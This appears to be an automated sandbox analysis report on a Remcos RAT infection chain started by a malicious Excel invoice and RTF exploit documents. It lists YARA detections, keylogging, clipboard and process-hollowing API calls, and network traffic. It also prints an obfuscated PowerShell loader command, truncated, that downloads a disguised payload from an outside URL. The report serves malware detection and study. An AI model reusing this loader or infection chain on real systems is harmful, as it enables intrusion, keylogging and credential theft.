                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 0000000F.00000002.498150575.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49167 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000014_2_0040A2F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A41B
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR

                System Summary

                barindex
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3264, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: August Shipment - Inv No. 041.xlsOLE: Microsoft Excel 2007+
                Source: C9730000.0.drOLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GQ1oBm.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a38.fr.urlJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9390
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9390Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,14_2_0041330D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,14_2_0041BBC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,14_2_0041BB9A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_004167EF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_002BFCD89_2_002BFCD8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00264D5813_2_00264D58
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00264D4813_2_00264D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043706A14_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041400514_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E11C14_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004541D914_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004381E814_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041F18B14_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044627014_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E34B14_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004533AB14_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042742E14_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043756614_2_00437566
